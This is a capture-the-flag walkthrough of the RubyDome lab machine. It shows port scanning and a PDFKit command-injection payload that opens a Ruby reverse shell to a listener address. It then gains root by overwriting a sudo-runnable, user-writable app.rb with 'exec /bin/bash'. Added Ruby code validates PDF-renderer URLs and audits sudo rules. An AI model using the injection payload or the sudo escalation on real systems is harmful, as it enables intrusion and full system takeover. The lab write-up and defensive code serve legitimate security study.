RubyDome Proving Grounds

Initial Recon


Nmap

```
nmap -p- -PS 192.168.157.22 -v -T4 -oN pingscan.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-18 20:56 EET
Initiating Ping Scan at 20:56
Host is up (0.050s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
```

```
nmap -p 3000 -sC -sV 192.168.157.22 -v -T4 -oN port3000
PORT     STATE SERVICE VERSION
3000/tcp open  http    WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
|_http-title: RubyDome HTML to PDF
```

Feroxbuster

```
feroxbuster -u http://192.168.157.22:3000/ -k -C 404 400 302 -o feroxFuZZ.txt
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  ` /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.157.22:3000/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 💢  Status Code Filters   │ [404, 400, 302]
 💥  Timeout (secs)        │ 7
 🦑  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💾  Output File           │ feroxFuZZ.txt
 🏁  HTTP methods          │ [GET]
 🔓  Insecure              │ true
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       21l       37w       -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       22l       54w      775c http://192.168.157.22:3000/
[####################] - 83s    30001/30001   0s      found:1       errors:0
[####################] - 83s    30000/30000   362/s   http://192.168.157.22:3000/
```

[screenshot: the RubyDome HTML-to-PDF page]

As the screenshot shows, the page takes a URL and converts that page to a PDF.

When a random address is given, the following error is thrown:

[screenshot: error page]

Searching for an exploit turned up the following one:

https://github.com/shamo0/PDFkit-CMD-Injection

Initial access


The exploit is a POST request, in this case to the pdf endpoint, carrying the following payload:

```
url=http%3A%2F%2FLOCAL-ADDRESS%3ALOCAL-PORT%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22LOCAL-ADDRESS%22%2CLOCAL-PORT%29%29%27%60'
```
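For the defender's side of this bug, here is an added example (my own code, not the RubyDome app's and not PDFKit's) of how a Ruby service should treat a user-supplied URL before handing it to an HTML-to-PDF renderer: reject anything that carries shell metacharacters or a non-HTTP scheme, and invoke the renderer with an argv array so no shell ever parses the URL. The renderer name wkhtmltopdf is an assumption about what sits behind the app, and the function names are mine.

```ruby
require "uri"
require "open3"

# Added example, not the original app's code: validate a URL destined for an
# external renderer, then invoke that renderer without a shell.

ALLOWED_SCHEMES = %w[http https].freeze
MAX_URL_BYTES   = 2048

# Characters a page URL never needs but a shell cares about. Whitespace and
# backticks are what the injection shape above relies on once the form value
# has been URL-decoded; the rest cover the other shell syntaxes. Rejecting is
# safer than trying to escape.
SHELL_METACHARS = /[\s`'"$\\|;<>]/

def render_url_ok?(raw)
  return false unless raw.is_a?(String)
  return false if raw.bytesize > MAX_URL_BYTES
  return false if raw.match?(SHELL_METACHARS)

  uri = URI.parse(raw)
  return false unless ALLOWED_SCHEMES.include?(uri.scheme)
  return false if uri.host.nil? || uri.host.empty?

  true
rescue URI::Error
  false
end

# Build the renderer command as an argv array. Each element is passed to the
# program as one argument, never through `sh -c`, so the URL can only ever be
# a URL. The renderer name is an assumption (PDFKit drives wkhtmltopdf).
def build_render_argv(raw, out_path, renderer: "wkhtmltopdf")
  raise ArgumentError, "rejected URL: #{raw.inspect}" unless render_url_ok?(raw)
  [renderer, raw, out_path]
end

# Run the renderer. Open3.capture3 with several arguments execs the program
# directly (no shell), so even a URL that slipped past validation cannot inject.
def render_to_pdf(raw, out_path, renderer: "wkhtmltopdf")
  argv = build_render_argv(raw, out_path, renderer: renderer)
  _stdout, stderr, status = Open3.capture3(*argv)
  status.success? || raise("renderer failed: #{stderr.strip}")
end
```

The injection above only works because the decoded URL still contains whitespace and a backtick when it reaches a shell string; the validator turns that request into a rejection the app can log and alert on, while the argv-based call is the real fix because it removes the shell from the path entirely.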

After editing the payload with the listener address and port, a reverse shell is obtained with the following request:

[screenshot: reverse-shell request]

and the result:

[screenshot: reverse-shell result]

followed by the user flag:

[screenshot: user flag]

Privilege Escalation


Running sudo -l shows that the user andrew can run:

```
sudo /usr/bin/ruby /home/andrew/app/app.rb
```

Inspecting the file shows that it contains the application's home page.

The user has read and write access to the file:

[screenshot: file permissions]

With that confirmed, the file was overwritten with:

```
echo 'exec "/bin/bash"' > /home/andrew/app/app.rb
```

Afterwards the command

```
sudo /usr/bin/ruby /home/andrew/app/app.rb
```

was executed, which granted root access.
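The root cause of this escalation is a sudo rule that lets andrew run, as root, an interpreter on a script that andrew can write to. As an added example (my own code, not part of the original post), the following Ruby audits such a rule: it pulls the absolute paths out of the command and reports which of them the invoking user could modify. The permission check is kept pure so it can be exercised without root, and the temporary file in the demo stands in for /home/andrew/app/app.rb.

```ruby
require "tempfile"

# Added example, not from the original post: audit a sudo command line such as
#   "/usr/bin/ruby /home/andrew/app/app.rb"
# and flag every absolute path the invoking user could write to.

# Pure check on stat-like values. Returns true when invoker_uid, who belongs
# to invoker_gids, can write the file. (root's ability to write anything is
# deliberately not modelled: sudo rules are written for non-root invokers.)
def writable_by_invoker?(owner_uid:, group_gid:, mode:, invoker_uid:, invoker_gids:)
  return true if invoker_uid == owner_uid && (mode & 0o200) != 0
  return true if invoker_gids.include?(group_gid) && (mode & 0o020) != 0
  (mode & 0o002) != 0
end

# Classify one path as :missing, :writable (by the invoker) or :ok.
def classify_path(path, invoker_uid:, invoker_gids:)
  st = File.stat(path)
  writable = writable_by_invoker?(owner_uid: st.uid, group_gid: st.gid,
                                  mode: st.mode & 0o777,
                                  invoker_uid: invoker_uid,
                                  invoker_gids: invoker_gids)
  writable ? :writable : :ok
rescue Errno::ENOENT, Errno::ENOTDIR, Errno::EACCES
  :missing
end

# Take the command part of a sudoers rule or `sudo -l` line and return
# [[path, status], ...] for every absolute-path token in it.
def audit_sudo_command(command, invoker_uid: Process.uid, invoker_gids: Process.groups)
  command.split.select { |tok| tok.start_with?("/") }.map do |path|
    [path, classify_path(path, invoker_uid: invoker_uid, invoker_gids: invoker_gids)]
  end
end

# Only the findings that need action.
def writable_sudo_targets(command, **opts)
  audit_sudo_command(command, **opts)
    .select { |_path, status| status == :writable }
    .map(&:first)
end

if $PROGRAM_NAME == __FILE__
  # Constructed demo: a script owned and writable by the current user stands in
  # for /home/andrew/app/app.rb.
  Tempfile.create(["app", ".rb"]) do |f|
    f.write("puts 'hello'\n")
    f.flush
    rule = "/usr/bin/ruby #{f.path}"
    audit_sudo_command(rule).each { |path, status| puts "#{status.to_s.ljust(8)} #{path}" }
  end
end
```

The fix for the rule itself is to make the script (and every directory on the path to it) root-owned and not writable by the invoking user, or to drop the rule; a check like this one run from a configuration audit catches the regression before someone else finds it.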

